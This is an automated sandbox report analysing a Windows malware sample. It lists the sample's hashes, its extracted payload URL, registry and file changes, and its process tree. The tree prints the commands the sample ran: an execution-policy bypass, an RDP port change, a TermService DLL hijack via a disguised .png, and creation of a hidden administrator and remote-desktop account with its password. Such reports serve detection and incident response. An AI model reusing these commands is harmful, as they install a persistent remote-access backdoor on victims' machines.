Resubmissions
02-09-2021 16:57
210902-vgpzjadhhn 1002-09-2021 16:25
210902-tw1h5sage4 1002-09-2021 11:31
210902-9dk89x9wb2 1014-08-2021 13:56
210814-xdxpv1yk2x 10Analysis
-
max time kernel
1665s -
max time network
1733s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
02-09-2021 16:57
Static task
static1
Behavioral task
behavioral1
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win10v20210408
General
-
Target
472208d7ba18d4c14b7e90b9db5d6feb.exe
-
Size
5.9MB
-
MD5
472208d7ba18d4c14b7e90b9db5d6feb
-
SHA1
ff24cc43998ff99e61b1a838e1d51c4888498935
-
SHA256
ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
-
SHA512
9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 17 3920 powershell.exe 19 3920 powershell.exe 20 3920 powershell.exe 21 3920 powershell.exe 23 3920 powershell.exe 25 3920 powershell.exe 27 3920 powershell.exe 29 3920 powershell.exe 31 3920 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 2052 2052 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_mrbjh4nt.5sl.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC7BC.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC7FC.tmp powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_o5pexc1t.zjm.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC80D.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC73D.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC79C.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3144 powershell.exe 3144 powershell.exe 3144 powershell.exe 2484 powershell.exe 2484 powershell.exe 2484 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 2784 powershell.exe 2784 powershell.exe 2784 powershell.exe 3144 powershell.exe 3144 powershell.exe 3144 powershell.exe 3920 powershell.exe 3920 powershell.exe 3920 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 608 608 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 568 472208d7ba18d4c14b7e90b9db5d6feb.exe Token: SeDebugPrivilege 3144 powershell.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeIncreaseQuotaPrivilege 2484 powershell.exe Token: SeSecurityPrivilege 2484 powershell.exe Token: SeTakeOwnershipPrivilege 2484 powershell.exe Token: SeLoadDriverPrivilege 2484 powershell.exe Token: SeSystemProfilePrivilege 2484 powershell.exe Token: SeSystemtimePrivilege 2484 powershell.exe Token: SeProfSingleProcessPrivilege 2484 powershell.exe Token: SeIncBasePriorityPrivilege 2484 powershell.exe Token: SeCreatePagefilePrivilege 2484 powershell.exe Token: SeBackupPrivilege 2484 powershell.exe Token: SeRestorePrivilege 2484 powershell.exe Token: SeShutdownPrivilege 2484 powershell.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeSystemEnvironmentPrivilege 2484 powershell.exe Token: SeRemoteShutdownPrivilege 2484 powershell.exe Token: SeUndockPrivilege 2484 powershell.exe Token: SeManageVolumePrivilege 2484 powershell.exe Token: 33 2484 powershell.exe Token: 34 2484 powershell.exe Token: 35 2484 powershell.exe Token: 36 2484 powershell.exe Token: SeDebugPrivilege 732 powershell.exe Token: SeIncreaseQuotaPrivilege 732 powershell.exe Token: SeSecurityPrivilege 732 powershell.exe Token: SeTakeOwnershipPrivilege 732 powershell.exe Token: SeLoadDriverPrivilege 732 powershell.exe Token: SeSystemProfilePrivilege 732 powershell.exe Token: SeSystemtimePrivilege 732 powershell.exe Token: SeProfSingleProcessPrivilege 732 powershell.exe Token: SeIncBasePriorityPrivilege 732 powershell.exe Token: SeCreatePagefilePrivilege 732 powershell.exe Token: SeBackupPrivilege 732 powershell.exe Token: SeRestorePrivilege 732 powershell.exe Token: SeShutdownPrivilege 732 powershell.exe Token: SeDebugPrivilege 732 powershell.exe Token: SeSystemEnvironmentPrivilege 732 powershell.exe Token: SeRemoteShutdownPrivilege 732 powershell.exe Token: SeUndockPrivilege 732 powershell.exe Token: SeManageVolumePrivilege 732 powershell.exe Token: 33 732 powershell.exe Token: 34 732 powershell.exe Token: 35 732 powershell.exe Token: 36 732 powershell.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeIncreaseQuotaPrivilege 2784 powershell.exe Token: SeSecurityPrivilege 2784 powershell.exe Token: SeTakeOwnershipPrivilege 2784 powershell.exe Token: SeLoadDriverPrivilege 2784 powershell.exe Token: SeSystemProfilePrivilege 2784 powershell.exe Token: SeSystemtimePrivilege 2784 powershell.exe Token: SeProfSingleProcessPrivilege 2784 powershell.exe Token: SeIncBasePriorityPrivilege 2784 powershell.exe Token: SeCreatePagefilePrivilege 2784 powershell.exe Token: SeBackupPrivilege 2784 powershell.exe Token: SeRestorePrivilege 2784 powershell.exe Token: SeShutdownPrivilege 2784 powershell.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeSystemEnvironmentPrivilege 2784 powershell.exe Token: SeRemoteShutdownPrivilege 2784 powershell.exe Token: SeUndockPrivilege 2784 powershell.exe Token: SeManageVolumePrivilege 2784 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 568 wrote to memory of 3144 568 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 568 wrote to memory of 3144 568 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 3144 wrote to memory of 496 3144 powershell.exe csc.exe PID 3144 wrote to memory of 496 3144 powershell.exe csc.exe PID 496 wrote to memory of 760 496 csc.exe cvtres.exe PID 496 wrote to memory of 760 496 csc.exe cvtres.exe PID 3144 wrote to memory of 2484 3144 powershell.exe powershell.exe PID 3144 wrote to memory of 2484 3144 powershell.exe powershell.exe PID 3144 wrote to memory of 732 3144 powershell.exe powershell.exe PID 3144 wrote to memory of 732 3144 powershell.exe powershell.exe PID 3144 wrote to memory of 2784 3144 powershell.exe powershell.exe PID 3144 wrote to memory of 2784 3144 powershell.exe powershell.exe PID 3144 wrote to memory of 3560 3144 powershell.exe reg.exe PID 3144 wrote to memory of 3560 3144 powershell.exe reg.exe PID 3144 wrote to memory of 1592 3144 powershell.exe reg.exe PID 3144 wrote to memory of 1592 3144 powershell.exe reg.exe PID 3144 wrote to memory of 2776 3144 powershell.exe reg.exe PID 3144 wrote to memory of 2776 3144 powershell.exe reg.exe PID 3144 wrote to memory of 2172 3144 powershell.exe net.exe PID 3144 wrote to memory of 2172 3144 powershell.exe net.exe PID 2172 wrote to memory of 2972 2172 net.exe net1.exe PID 2172 wrote to memory of 2972 2172 net.exe net1.exe PID 3144 wrote to memory of 732 3144 powershell.exe cmd.exe PID 3144 wrote to memory of 732 3144 powershell.exe cmd.exe PID 732 wrote to memory of 1192 732 cmd.exe cmd.exe PID 732 wrote to memory of 1192 732 cmd.exe cmd.exe PID 1192 wrote to memory of 3852 1192 cmd.exe net.exe PID 1192 wrote to memory of 3852 1192 cmd.exe net.exe PID 3852 wrote to memory of 3984 3852 net.exe net1.exe PID 3852 wrote to memory of 3984 3852 net.exe net1.exe PID 3144 wrote to memory of 2792 3144 powershell.exe cmd.exe PID 3144 wrote to memory of 2792 3144 powershell.exe cmd.exe PID 2792 wrote to memory of 2912 2792 cmd.exe cmd.exe PID 2792 wrote to memory of 2912 2792 cmd.exe cmd.exe PID 2912 wrote to memory of 3864 2912 cmd.exe net.exe PID 2912 wrote to memory of 3864 2912 cmd.exe net.exe PID 3864 wrote to memory of 3264 3864 net.exe net1.exe PID 3864 wrote to memory of 3264 3864 net.exe net1.exe PID 2268 wrote to memory of 2900 2268 cmd.exe net.exe PID 2268 wrote to memory of 2900 2268 cmd.exe net.exe PID 2900 wrote to memory of 3168 2900 net.exe net1.exe PID 2900 wrote to memory of 3168 2900 net.exe net1.exe PID 3832 wrote to memory of 2476 3832 cmd.exe net.exe PID 3832 wrote to memory of 2476 3832 cmd.exe net.exe PID 2476 wrote to memory of 3560 2476 net.exe net1.exe PID 2476 wrote to memory of 3560 2476 net.exe net1.exe PID 1860 wrote to memory of 4044 1860 cmd.exe net.exe PID 1860 wrote to memory of 4044 1860 cmd.exe net.exe PID 4044 wrote to memory of 756 4044 net.exe net1.exe PID 4044 wrote to memory of 756 4044 net.exe net1.exe PID 1644 wrote to memory of 1420 1644 cmd.exe net.exe PID 1644 wrote to memory of 1420 1644 cmd.exe net.exe PID 1420 wrote to memory of 1504 1420 net.exe net1.exe PID 1420 wrote to memory of 1504 1420 net.exe net1.exe PID 3836 wrote to memory of 3156 3836 cmd.exe net.exe PID 3836 wrote to memory of 3156 3836 cmd.exe net.exe PID 3156 wrote to memory of 3752 3156 net.exe net1.exe PID 3156 wrote to memory of 3752 3156 net.exe net1.exe PID 2248 wrote to memory of 188 2248 cmd.exe net.exe PID 2248 wrote to memory of 188 2248 cmd.exe net.exe PID 188 wrote to memory of 3972 188 net.exe net1.exe PID 188 wrote to memory of 3972 188 net.exe net1.exe PID 2484 wrote to memory of 2244 2484 cmd.exe WMIC.exe PID 2484 wrote to memory of 2244 2484 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\khb00ypm\khb00ypm.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:496 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6363.tmp" "c:\Users\Admin\AppData\Local\Temp\khb00ypm\CSC662AA544276048D0A04263C9CC1ECCAF.TMP"4⤵PID:760
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3560
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1592 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2776
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2972
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3984
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3264
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2268
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:188
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3168
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 1fp0fXTo /add1⤵
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 1fp0fXTo /add2⤵
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 1fp0fXTo /add3⤵PID:3560
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:756
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:1504
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:3752
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 1fp0fXTo1⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 1fp0fXTo2⤵
- Suspicious use of WriteProcessMemory
PID:188 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 1fp0fXTo3⤵PID:3972
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:2244
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1508
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:2816
-
